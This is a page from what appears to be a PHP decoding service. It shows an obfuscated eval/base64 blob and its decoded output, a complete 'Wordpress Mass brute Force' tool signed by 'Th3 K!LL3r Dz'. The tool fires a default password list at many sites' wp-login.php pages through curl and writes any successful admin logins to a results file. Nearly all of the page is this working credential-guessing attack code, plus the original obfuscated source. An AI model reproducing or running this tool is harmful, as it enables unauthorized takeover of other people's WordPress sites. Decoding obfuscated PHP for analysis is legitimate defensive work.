Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<? eval(gzinflate(base64_decode("fZY3DvPqFUR7A97Eq/4HFswJhgtRzDmIH0NjMIk5Z67eKlx7CRd35pw..

Decoded Output download

<html>
<head>
	<link href="http://dz48-coders.org/indexi/pic/favicon.ico" type="image/x-icon" rel="shortcut icon" />
	<meta name="author" content="Th3 K!LL3r Dz" />
    <meta name="keywords" content="website, Relizane, hackers ,relizane hacker" />
    <meta name="description" content="Th3 K!LL3r Dz fr0m Relizane !n aLGeria" />
<title># Wordpress Mass brute Force #</title>
 <style type='text/css'>
 input[type=submit], input[type=button], input[type=reset]{
	text-align:center;
	background:url(http://i43.tinypic.com/5owgmq.jpg) repeat-x center bottom #666666;
	border:1px solid #4D4D4D;
	color:#FFFFFF;
	border-top-color:#565656;
	padding:4px 6px;
	margin:4px 5px;
	height:16px;
	-moz-box-shadow:0 0 1px black;
	-webkit-box-shadow:0 0 1px black;
	box-shadow:0 0 1px black;
	text-shadow:0 1px black;
	-moz-border-radius:4px;
	-webkit-border-radius:4px;
	-khtml-border-radius:4px;
	border-radius:4px;
	height:23px;
}


input[type=text], input[type=password]{
	background:urlhttp://i43.tinypic.com/5owgmq.jpg) repeat-x center bottom #666666;
	border:1px solid #4D4D4D;
	color:#CCCCCC;
	border-top-color:#565656;
	-moz-box-shadow:0 0 1px black;
	-webkit-box-shadow:0 0 1px black;
	box-shadow:0 0 1px black;
	-moz-border-radius:4px;
	-webkit-border-radius:4px;
	-khtml-border-radius:4px;
	border-radius:4px;
	height:18px;
	margin-left: 5px;
}
input , textarea , button , body , caption , table ,area , option {
    outline:none;
    transition: all 0.20s ease-in-out;
    -webkit-transition: all 0.25s ease-in-out;
    -moz-transition: all 0.25s ease-in-out;
    border-radius:3px;
    -webkit-border-radius:3px;
    -moz-border-radius:3px;
    //border:1px solid rgba(0,0,0, 0.2);
 /*   font-family: 'Gill Sans', 'Gill Sans MT', Calibri, 'Trebuchet MS', sans-serif; */
}
input , textarea {
    background: url('http://i41.tinypic.com/ibkmd5.png') repeat scroll 0 0 #8B8B8B;';
}




body{
/*	font-family : Verdana; */
	color : #FFFFFF;
	font-size : 14px;
	font-family:tahoma;
	background: url(http://i44.tinypic.com/i56tc9.jpg) no-repeat center top #252525;
}
input , textarea {
    outline:none;
    transition: all 0.20s ease-in-out;
    -webkit-transition: all 0.25s ease-in-out;
    -moz-transition: all 0.25s ease-in-out;
    border-radius:3px;
    -webkit-border-radius:3px;
    -moz-border-radius:3px;
    border:1px solid rgba(0,0,0, 0.2);
}
input:focus, textarea:focus {
  outline: 0;
  border-color: rgba(82, 168, 236, 0.8);
  -webkit-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
  -moz-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
  box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);


    background: url('http://i41.tinypic.com/ibkmd5.png') repeat scroll 0 0 #8B8B8B;';
    overflow: auto;

}
.x1 {}
.x2 {font-size:13px;
background-color:green;
color:black;}
hr {color:white;}
a {color:black;}
#x5 {
	font-family:tahoma;}
.d1 {color :#C17E0B;
font-family:tahoma;
font-size:13px;
font-weight:bold;}
#d4 {color:#C17E0B;
font-family:tahoma;
font-weight:bold;}
  </style>
  </head>
</br></br>
<center><b><font > Wordpress Mass brute Force </font></b><br /><br /><br />
<form method="post" action="" enctype="multipart/form-data"> 
<table width="50%" border="0">
<tr><td><p ><font class="d1">User :</font>
<input type="text" name="usr" value='admin' size="15"> </font><br /><br /></p>
</td></tr>
<tr><td><font class="d1">Sites list :</font> 
</td><td><font class="d1" >Pass list :</font></td></tr>
<tr><td>
<textarea name="sites" cols="40" rows="13" ></textarea>
</td><td>
<textarea name="w0rds" cols="20" rows="13" >
admin
123456
password
102030
123123
12345
123456789
pass
test
admin123
demo
</textarea>
</td></tr><tr><td>
<font > 
<input type="submit" name="x" value="start" id="d4"> 
</font></td></tr></table>
</form></center>@set_time_limit(0); 
if($_POST['x']){ 

echo "<hr>"; 

$sites = explode("
",$_POST["sites"]); // Get Sites By Th3 K!LL3r Dz ! 
$w0rds = explode("
",$_POST["w0rds"]); // Get w0rdLiSt By Th3 K!LL3r Dz ! 

$Attack = new Wordpress_brute_Force(); // Active Class 


foreach($w0rds as $pwd){ 
foreach($sites as $site){ 


$Attack->check_it(txt_cln($site),$_POST['usr'],txt_cln($pwd)); // Brute :D 
flush();flush(); 

} 
} 
} 

# Class & Function'z 

function txt_cln($value){  return str_replace(array("
","
"),"",$value); } 

class Wordpress_brute_Force{ 

public function check_it($site,$user,$pass){ // print result 

if(eregi('profile.php',$this->post($site,$user,$pass))){ 
 echo "<span class=\"x2\"><b># Success : $user:$pass -> <a href='$site/wp-admin/'>$site/wp-admin/</a></b></span><BR>";
$f = fopen("Wp-Result.txt","a+"); fwrite($f , "Success ~~ $user:$pass -> $site/wp-admin/
"); fclose($f); 
flush();
}else{ echo "# Failed : $user:$pass -> $site<BR>"; flush();} 

}  

public function post($site,$user,$pass){ // Post -> user & pass 
$login =$site.'/wp-login.php';
$to = $site.'/wp-admin';
$token = $this->extract_token($site); 
$log = array ('Log In','&#1583;&#1582;&#1608;&#1604;');
$data = array ('log'=>$user,'pwd'=>$pass,'rememberme'=>'forever','wp-submit'=>$log,'redirect_to'=>$to,'testcookie'=>1);

$curl=curl_init(); 

curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); 
curl_setopt($curl,CURLOPT_URL,$login); 
@curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt'); 
@curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt'); 
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4'); 
@curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1); 
curl_setopt($curl,CURLOPT_POST,1); 
curl_setopt($curl,CURLOPT_POSTFIELDS,$data); 
curl_setopt($curl,CURLOPT_TIMEOUT,20); 

$exec=curl_exec($curl); 
curl_close($curl); 
return $exec; 

} 

public function extract_token($site){ // get token from source for -> function post 

$source = $this->get_source($site); 

preg_match_all("/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si" ,$source,$token); 

return $token[1][0]; 

} 

public function get_source($site){ // get source for -> function extract_token 

$curl=curl_init(); 
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); 
curl_setopt($curl,CURLOPT_URL,$login); 
@curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt'); 
@curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt'); 
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4'); 
@curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1); 
curl_setopt($curl,CURLOPT_TIMEOUT,20); 

$exec=curl_exec($curl); 
curl_close($curl); 
return $exec; 
} 
} 

Did this file decode correctly?

Original Code

<? 
eval(gzinflate(base64_decode("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")));

?>

Function Calls

gzinflate 3
base64_decode 3

Variables

None

Stats

MD5 119a8c475e90f8deea8e489db222d8f1
Eval Count 3
Decode Time 138 ms